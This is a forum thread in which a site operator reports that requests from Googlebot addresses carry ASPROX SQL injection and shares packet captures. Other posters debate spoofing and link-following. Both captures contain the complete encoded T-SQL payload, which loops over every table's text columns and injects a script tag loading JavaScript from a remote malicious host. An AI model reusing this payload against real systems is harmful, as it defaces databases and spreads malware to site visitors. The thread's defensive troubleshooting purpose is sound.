vladfriedman
asked on
Google used as a hacking tool - inadvertanty attacking my site
Google is somehow being used or manipulated to attack our website. We have an IPS that records all attack traffic. At least 500 times a day, googlebot attempts to hit a few sites in our facility with either sql injection such as ASPROX. Because our IPS blocks the traffic, googlebot is never able to index the pages. The site itself is not compromised in anyway and we cannot seem to determine why google is trying to do this. Because googlebots traffic is being blocked, it is continuing to hit the site relentlessly.
Some packet captures are below
Some packet captures are below
Frame 1 (1484 bytes on wire, 1484 bytes captured)
Arrival Time: May 19, 2009 04:16:02.248079000
Time delta from previous packet: 0.000000000 seconds
Time since reference or first frame: 0.000000000 seconds
Frame Number: 1
Packet Length: 1484 bytes
Capture Length: 1484 bytes
Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 1470
Identification: 0xeb57 (60247)
Flags: 0x04 (Don't Fragment)
0... = Reserved bit: Not set
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 56
Protocol: TCP (0x06)
Header checksum: 0x052a [correct]
Good: True
Bad : False
Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)
Destination: www.coolabah.com (69.63.131.110)
Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
Source port: 41347 (41347)
Destination port: http (80)
Sequence number: 0 (relative sequence number)
Next sequence number: 1418 (relative sequence number)
Acknowledgement number: 0 (relative ack number)
Header length: 32 bytes
Flags: 0x0010 (ACK)
0... .... = Congestion Window Reduced (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...1 .... = Acknowledgment: Set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..0. = Syn: Not set
.... ...0 = Fin: Not set
Window size: 90
Checksum: 0x9fda [correct]
Options: (12 bytes)
NOP
NOP
Time stamp: tsval 121714743, tsecr 0
TCP segment data (1418 bytes)
0000 00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00 ........l=....E.
0010 05 be eb 57 40 00 38 06 05 2a 42 f9 41 12 45 3f ...W@.8..*B.A.E?
0020 83 6e a1 83 00 50 ce cb d3 62 d5 94 b0 51 80 10 .n...P...b...Q..
0030 00 5a 9f da 00 00 01 01 08 0a 07 41 38 37 00 00 .Z.........A87..
0040 00 00 47 45 54 20 2f 73 70 6f 72 74 2f 6d 61 67 ..GET /sport/mag
0050 70 69 65 73 2e 63 66 6d 3f 3b 44 45 43 4c 41 52 pies.cfm?;DECLAR
0060 45 25 32 30 40 53 25 32 30 43 48 41 52 28 34 30 E%20@S%20CHAR(40
0070 30 30 29 3b 53 45 54 25 32 30 40 53 3d 43 41 53 00);SET%20@S=CAS
0080 54 28 30 78 34 34 34 35 34 33 34 43 34 31 35 32 T(0x4445434C4152
0090 34 35 32 30 34 30 35 34 32 30 37 36 36 31 37 32 4520405420766172
00a0 36 33 36 38 36 31 37 32 32 38 33 32 33 35 33 35 6368617228323535
00b0 32 39 32 43 34 30 34 33 32 30 37 36 36 31 37 32 292C404320766172
00c0 36 33 36 38 36 31 37 32 32 38 33 34 33 30 33 30 6368617228343030
00d0 33 30 32 39 32 30 34 34 34 35 34 33 34 43 34 31 3029204445434C41
00e0 35 32 34 35 32 30 35 34 36 31 36 32 36 43 36 35 5245205461626C65
00f0 35 46 34 33 37 35 37 32 37 33 36 46 37 32 32 30 5F437572736F7220
0100 34 33 35 35 35 32 35 33 34 46 35 32 32 30 34 36 435552534F522046
0110 34 46 35 32 32 30 37 33 36 35 36 43 36 35 36 33 4F522073656C6563
0120 37 34 32 30 36 31 32 45 36 45 36 31 36 44 36 35 7420612E6E616D65
0130 32 43 36 32 32 45 36 45 36 31 36 44 36 35 32 30 2C622E6E616D6520
0140 36 36 37 32 36 46 36 44 32 30 37 33 37 39 37 33 66726F6D20737973
0150 36 46 36 32 36 41 36 35 36 33 37 34 37 33 32 30 6F626A6563747320
0160 36 31 32 43 37 33 37 39 37 33 36 33 36 46 36 43 612C737973636F6C
0170 37 35 36 44 36 45 37 33 32 30 36 32 32 30 37 37 756D6E7320622077
0180 36 38 36 35 37 32 36 35 32 30 36 31 32 45 36 39 6865726520612E69
0190 36 34 33 44 36 32 32 45 36 39 36 34 32 30 36 31 643D622E69642061
01a0 36 45 36 34 32 30 36 31 32 45 37 38 37 34 37 39 6E6420612E787479
01b0 37 30 36 35 33 44 32 37 37 35 32 37 32 30 36 31 70653D2775272061
01c0 36 45 36 34 32 30 32 38 36 32 32 45 37 38 37 34 6E642028622E7874
01d0 37 39 37 30 36 35 33 44 33 39 33 39 32 30 36 46 7970653D3939206F
01e0 37 32 32 30 36 32 32 45 37 38 37 34 37 39 37 30 7220622E78747970
01f0 36 35 33 44 33 33 33 35 32 30 36 46 37 32 32 30 653D3335206F7220
0200 36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44 622E78747970653D
0210 33 32 33 33 33 31 32 30 36 46 37 32 32 30 36 32 323331206F722062
0220 32 45 37 38 37 34 37 39 37 30 36 35 33 44 33 31 2E78747970653D31
0230 33 36 33 37 32 39 32 30 34 46 35 30 34 35 34 45 363729204F50454E
0240 32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33 205461626C655F43
0250 37 35 37 32 37 33 36 46 37 32 32 30 34 36 34 35 7572736F72204645
0260 35 34 34 33 34 38 32 30 34 45 34 35 35 38 35 34 544348204E455854
0270 32 30 34 36 35 32 34 46 34 44 32 30 32 30 35 34 2046524F4D202054
0280 36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32 61626C655F437572
0290 37 33 36 46 37 32 32 30 34 39 34 45 35 34 34 46 736F7220494E544F
02a0 32 30 34 30 35 34 32 43 34 30 34 33 32 30 35 37 2040542C40432057
02b0 34 38 34 39 34 43 34 35 32 38 34 30 34 30 34 36 48494C4528404046
02c0 34 35 35 34 34 33 34 38 35 46 35 33 35 34 34 31 455443485F535441
02d0 35 34 35 35 35 33 33 44 33 30 32 39 32 30 34 32 5455533D30292042
02e0 34 35 34 37 34 39 34 45 32 30 36 35 37 38 36 35 4547494E20657865
02f0 36 33 32 38 32 37 37 35 37 30 36 34 36 31 37 34 6328277570646174
0300 36 35 32 30 35 42 32 37 32 42 34 30 35 34 32 42 65205B272B40542B
0310 32 37 35 44 32 30 37 33 36 35 37 34 32 30 35 42 275D20736574205B
0320 32 37 32 42 34 30 34 33 32 42 32 37 35 44 33 44 272B40432B275D3D
0330 32 37 32 37 32 32 33 45 33 43 32 46 37 34 36 39 2727223E3C2F7469
0340 37 34 36 43 36 35 33 45 33 43 37 33 36 33 37 32 746C653E3C736372
0350 36 39 37 30 37 34 32 30 37 33 37 32 36 33 33 44 697074207372633D
0360 32 32 36 38 37 34 37 34 37 30 33 41 32 46 32 46 22687474703A2F2F
0370 37 37 37 37 37 37 33 33 32 45 37 33 37 33 33 31 777777332E737331
0380 33 31 37 31 36 45 32 45 36 33 36 45 32 46 36 33 31716E2E636E2F63
0390 37 33 37 32 37 33 37 33 32 46 37 37 32 45 36 41 737273732F772E6A
03a0 37 33 32 32 33 45 33 43 32 46 37 33 36 33 37 32 73223E3C2F736372
03b0 36 39 37 30 37 34 33 45 33 43 32 31 32 44 32 44 6970743E3C212D2D
03c0 32 37 32 37 32 42 35 42 32 37 32 42 34 30 34 33 27272B5B272B4043
03d0 32 42 32 37 35 44 32 30 37 37 36 38 36 35 37 32 2B275D2077686572
03e0 36 35 32 30 32 37 32 42 34 30 34 33 32 42 32 37 6520272B40432B27
03f0 32 30 36 45 36 46 37 34 32 30 36 43 36 39 36 42 206E6F74206C696B
0400 36 35 32 30 32 37 32 37 32 35 32 32 33 45 33 43 6520272725223E3C
0410 32 46 37 34 36 39 37 34 36 43 36 35 33 45 33 43 2F7469746C653E3C
0420 37 33 36 33 37 32 36 39 37 30 37 34 32 30 37 33 7363726970742073
0430 37 32 36 33 33 44 32 32 36 38 37 34 37 34 37 30 72633D2268747470
0440 33 41 32 46 32 46 37 37 37 37 37 37 33 33 32 45 3A2F2F777777332E
0450 37 33 37 33 33 31 33 31 37 31 36 45 32 45 36 33 73733131716E2E63
0460 36 45 32 46 36 33 37 33 37 32 37 33 37 33 32 46 6E2F63737273732F
0470 37 37 32 45 36 41 37 33 32 32 33 45 33 43 32 46 772E6A73223E3C2F
0480 37 33 36 33 37 32 36 39 37 30 37 34 33 45 33 43 7363726970743E3C
0490 32 31 32 44 32 44 32 37 32 37 32 37 32 39 34 36 212D2D2727272946
04a0 34 35 35 34 34 33 34 38 32 30 34 45 34 35 35 38 45544348204E4558
04b0 35 34 32 30 34 36 35 32 34 46 34 44 32 30 32 30 542046524F4D2020
04c0 35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35 5461626C655F4375
04d0 37 32 37 33 36 46 37 32 32 30 34 39 34 45 35 34 72736F7220494E54
04e0 34 46 32 30 34 30 35 34 32 43 34 30 34 33 32 30 4F2040542C404320
04f0 34 35 34 45 34 34 32 30 34 33 34 43 34 46 35 33 454E4420434C4F53
0500 34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46 45205461626C655F
0510 34 33 37 35 37 32 37 33 36 46 37 32 32 30 34 34 437572736F722044
0520 34 35 34 31 34 43 34 43 34 46 34 33 34 31 35 34 45414C4C4F434154
0530 34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46 45205461626C655F
0540 34 33 37 35 37 32 37 33 36 46 37 32 25 32 30 41 437572736F72%20A
0550 53 25 32 30 43 48 41 52 28 34 30 30 30 29 29 3b S%20CHAR(4000));
0560 45 58 45 43 28 40 53 29 3b 20 48 54 54 50 2f 31 EXEC(@S); HTTP/1
0570 2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 63 6f .1..Host: www.co
0580 6f 6c 61 62 61 68 2e 63 6f 6d 0d 0a 43 6f 6e 6e olabah.com..Conn
0590 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69 ection: Keep-ali
05a0 76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d ve..Accept: */*.
05b0 0a 46 72 6f 6d 3a 20 67 6f 6f 67 6c 65 62 6f 74 .From: googlebot
05c0 28 61 74 29 67 6f 6f 67 6c 65 62 6f (at)googlebo
-----------------------------------------------------------------------------------------------------
Frame 1 (1484 bytes on wire, 1484 bytes captured)
Arrival Time: May 19, 2009 04:08:20.781412000
Time delta from previous packet: 0.000000000 seconds
Time since reference or first frame: 0.000000000 seconds
Frame Number: 1
Packet Length: 1484 bytes
Capture Length: 1484 bytes
Protocols in frame: eth:ip:tcp:http
Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)
Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)
Type: IP (0x0800)
Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 1470
Identification: 0xb69e (46750)
Flags: 0x04 (Don't Fragment)
0... = Reserved bit: Not set
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 57
Protocol: TCP (0x06)
Header checksum: 0x325c [correct]
Good: True
Bad : False
Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)
Destination: 69.63.131.111 (69.63.131.111)
Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418
Source port: 33193 (33193)
Destination port: http (80)
Sequence number: 0 (relative sequence number)
Next sequence number: 1418 (relative sequence number)
Acknowledgement number: 0 (relative ack number)
Header length: 32 bytes
Flags: 0x0010 (ACK)
0... .... = Congestion Window Reduced (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...1 .... = Acknowledgment: Set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..0. = Syn: Not set
.... ...0 = Fin: Not set
Window size: 92
Checksum: 0x6bf1 [correct]
Options: (12 bytes)
NOP
NOP
Time stamp: tsval 3656893948, tsecr 0
TCP segment data (1418 bytes)
0000 00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00 ........l=....E.
0010 05 be b6 9e 40 00 39 06 32 5c 42 f9 47 98 45 3f ....@.9.2\B.G.E?
0020 83 6f 81 a9 00 50 de ea 73 7b 98 49 41 46 80 10 .o...P..s{.IAF..
0030 00 5c 6b f1 00 00 01 01 08 0a d9 f7 c5 fc 00 00 .\k.............
0040 00 00 47 45 54 20 2f 73 74 6f 72 79 31 31 38 2e ..GET /story118.
0050 63 66 6d 3f 27 3b 44 45 43 4c 41 52 45 25 32 30 cfm?';DECLARE%20
0060 40 53 25 32 30 43 48 41 52 28 34 30 30 30 29 3b @S%20CHAR(4000);
0070 53 45 54 25 32 30 40 53 3d 43 41 53 54 28 30 78 SET%20@S=CAST(0x
0080 34 34 34 35 34 33 34 43 34 31 35 32 34 35 32 30 4445434C41524520
0090 34 30 35 34 32 30 37 36 36 31 37 32 36 33 36 38 4054207661726368
00a0 36 31 37 32 32 38 33 32 33 35 33 35 32 39 32 43 617228323535292C
00b0 34 30 34 33 32 30 37 36 36 31 37 32 36 33 36 38 4043207661726368
00c0 36 31 37 32 32 38 33 34 33 30 33 30 33 30 32 39 6172283430303029
00d0 32 30 34 34 34 35 34 33 34 43 34 31 35 32 34 35 204445434C415245
00e0 32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33 205461626C655F43
00f0 37 35 37 32 37 33 36 46 37 32 32 30 34 33 35 35 7572736F72204355
0100 35 32 35 33 34 46 35 32 32 30 34 36 34 46 35 32 52534F5220464F52
0110 32 30 37 33 36 35 36 43 36 35 36 33 37 34 32 30 2073656C65637420
0120 36 31 32 45 36 45 36 31 36 44 36 35 32 43 36 32 612E6E616D652C62
0130 32 45 36 45 36 31 36 44 36 35 32 30 36 36 37 32 2E6E616D65206672
0140 36 46 36 44 32 30 37 33 37 39 37 33 36 46 36 32 6F6D207379736F62
0150 36 41 36 35 36 33 37 34 37 33 32 30 36 31 32 43 6A6563747320612C
0160 37 33 37 39 37 33 36 33 36 46 36 43 37 35 36 44 737973636F6C756D
0170 36 45 37 33 32 30 36 32 32 30 37 37 36 38 36 35 6E73206220776865
0180 37 32 36 35 32 30 36 31 32 45 36 39 36 34 33 44 726520612E69643D
0190 36 32 32 45 36 39 36 34 32 30 36 31 36 45 36 34 622E696420616E64
01a0 32 30 36 31 32 45 37 38 37 34 37 39 37 30 36 35 20612E7874797065
01b0 33 44 32 37 37 35 32 37 32 30 36 31 36 45 36 34 3D27752720616E64
01c0 32 30 32 38 36 32 32 45 37 38 37 34 37 39 37 30 2028622E78747970
01d0 36 35 33 44 33 39 33 39 32 30 36 46 37 32 32 30 653D3939206F7220
01e0 36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44 622E78747970653D
01f0 33 33 33 35 32 30 36 46 37 32 32 30 36 32 32 45 3335206F7220622E
0200 37 38 37 34 37 39 37 30 36 35 33 44 33 32 33 33 78747970653D3233
0210 33 31 32 30 36 46 37 32 32 30 36 32 32 45 37 38 31206F7220622E78
0220 37 34 37 39 37 30 36 35 33 44 33 31 33 36 33 37 747970653D313637
0230 32 39 32 30 34 46 35 30 34 35 34 45 32 30 35 34 29204F50454E2054
0240 36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32 61626C655F437572
0250 37 33 36 46 37 32 32 30 34 36 34 35 35 34 34 33 736F722046455443
0260 34 38 32 30 34 45 34 35 35 38 35 34 32 30 34 36 48204E4558542046
0270 35 32 34 46 34 44 32 30 32 30 35 34 36 31 36 32 524F4D2020546162
0280 36 43 36 35 35 46 34 33 37 35 37 32 37 33 36 46 6C655F437572736F
0290 37 32 32 30 34 39 34 45 35 34 34 46 32 30 34 30 7220494E544F2040
02a0 35 34 32 43 34 30 34 33 32 30 35 37 34 38 34 39 542C404320574849
02b0 34 43 34 35 32 38 34 30 34 30 34 36 34 35 35 34 4C45284040464554
02c0 34 33 34 38 35 46 35 33 35 34 34 31 35 34 35 35 43485F5354415455
02d0 35 33 33 44 33 30 32 39 32 30 34 32 34 35 34 37 533D302920424547
02e0 34 39 34 45 32 30 36 35 37 38 36 35 36 33 32 38 494E206578656328
02f0 32 37 37 35 37 30 36 34 36 31 37 34 36 35 32 30 2775706461746520
0300 35 42 32 37 32 42 34 30 35 34 32 42 32 37 35 44 5B272B40542B275D
0310 32 30 37 33 36 35 37 34 32 30 35 42 32 37 32 42 20736574205B272B
0320 34 30 34 33 32 42 32 37 35 44 33 44 32 37 32 37 40432B275D3D2727
0330 32 32 33 45 33 43 32 46 37 34 36 39 37 34 36 43 223E3C2F7469746C
0340 36 35 33 45 33 43 37 33 36 33 37 32 36 39 37 30 653E3C7363726970
0350 37 34 32 30 37 33 37 32 36 33 33 44 32 32 36 38 74207372633D2268
0360 37 34 37 34 37 30 33 41 32 46 32 46 37 37 37 37 7474703A2F2F7777
0370 37 37 33 33 32 45 37 33 37 33 33 31 33 31 37 31 77332E7373313171
0380 36 45 32 45 36 33 36 45 32 46 36 33 37 33 37 32 6E2E636E2F637372
0390 37 33 37 33 32 46 37 37 32 45 36 41 37 33 32 32 73732F772E6A7322
03a0 33 45 33 43 32 46 37 33 36 33 37 32 36 39 37 30 3E3C2F7363726970
03b0 37 34 33 45 33 43 32 31 32 44 32 44 32 37 32 37 743E3C212D2D2727
03c0 32 42 35 42 32 37 32 42 34 30 34 33 32 42 32 37 2B5B272B40432B27
03d0 35 44 32 30 37 37 36 38 36 35 37 32 36 35 32 30 5D20776865726520
03e0 32 37 32 42 34 30 34 33 32 42 32 37 32 30 36 45 272B40432B27206E
03f0 36 46 37 34 32 30 36 43 36 39 36 42 36 35 32 30 6F74206C696B6520
0400 32 37 32 37 32 35 32 32 33 45 33 43 32 46 37 34 272725223E3C2F74
0410 36 39 37 34 36 43 36 35 33 45 33 43 37 33 36 33 69746C653E3C7363
0420 37 32 36 39 37 30 37 34 32 30 37 33 37 32 36 33 7269707420737263
0430 33 44 32 32 36 38 37 34 37 34 37 30 33 41 32 46 3D22687474703A2F
0440 32 46 37 37 37 37 37 37 33 33 32 45 37 33 37 33 2F777777332E7373
0450 33 31 33 31 37 31 36 45 32 45 36 33 36 45 32 46 3131716E2E636E2F
0460 36 33 37 33 37 32 37 33 37 33 32 46 37 37 32 45 63737273732F772E
0470 36 41 37 33 32 32 33 45 33 43 32 46 37 33 36 33 6A73223E3C2F7363
0480 37 32 36 39 37 30 37 34 33 45 33 43 32 31 32 44 726970743E3C212D
0490 32 44 32 37 32 37 32 37 32 39 34 36 34 35 35 34 2D27272729464554
04a0 34 33 34 38 32 30 34 45 34 35 35 38 35 34 32 30 4348204E45585420
04b0 34 36 35 32 34 46 34 44 32 30 32 30 35 34 36 31 46524F4D20205461
04c0 36 32 36 43 36 35 35 46 34 33 37 35 37 32 37 33 626C655F43757273
04d0 36 46 37 32 32 30 34 39 34 45 35 34 34 46 32 30 6F7220494E544F20
04e0 34 30 35 34 32 43 34 30 34 33 32 30 34 35 34 45 40542C404320454E
04f0 34 34 32 30 34 33 34 43 34 46 35 33 34 35 32 30 4420434C4F534520
0500 35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35 5461626C655F4375
0510 37 32 37 33 36 46 37 32 32 30 34 34 34 35 34 31 72736F7220444541
0520 34 43 34 43 34 46 34 33 34 31 35 34 34 35 32 30 4C4C4F4341544520
0530 35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35 5461626C655F4375
0540 37 32 37 33 36 46 37 32 25 32 30 41 53 25 32 30 72736F72%20AS%20
0550 43 48 41 52 28 34 30 30 30 29 29 3b 45 58 45 43 CHAR(4000));EXEC
0560 28 40 53 29 3b 20 48 54 54 50 2f 31 2e 31 0d 0a (@S); HTTP/1.1..
0570 48 6f 73 74 3a 20 77 77 77 2e 6c 65 74 74 65 72 Host: www.letter
0580 66 72 6f 6d 6e 65 77 79 6f 72 6b 2e 63 6f 6d 0d fromnewyork.com.
0590 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 .Connection: Kee
05a0 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a p-alive..Accept:
05b0 20 2a 2f 2a 0d 0a 46 72 6f 6d 3a 20 67 6f 6f 67 */*..From: goog
05c0 6c 65 62 6f 74 28 61 74 29 67 6f 6f lebot(at)goo
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything, that was what tells me that it's not really google, they move on quite quickly and typically only follow links and look for robots.txt
Google-bot first tries to find a robots.txt file, it tries in each directory it makes it into, I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
Google-bot first tries to find a robots.txt file, it tries in each directory it makes it into, I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
I'm agree with richrumble. There are some tools to which use google to crawled in your website.
ASKER
It is the real google bot, it is originating from google owned IPs. If I setup a page sql injection commands pointing to a destination site, and then had google index my page, it would thn try all of the links on my site which included the sql injection commands.
I know this is google. The problem is not that google is originating the attack. The trick is identifying the source page that was originally indexed.
I know this is google. The problem is not that google is originating the attack. The trick is identifying the source page that was originally indexed.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data can be faked. Have you contacted Chris yet?
Best, ~Ray
Best, ~Ray
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributing via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a reciever, not a sender)
-rich
-rich
ASKER
Hi Ray. THe IP really can't can't be faked in our envionrment, and it is not being faked.
I am sure he will be interested and may have seen something similar that can help you out.
Best regards, ~Ray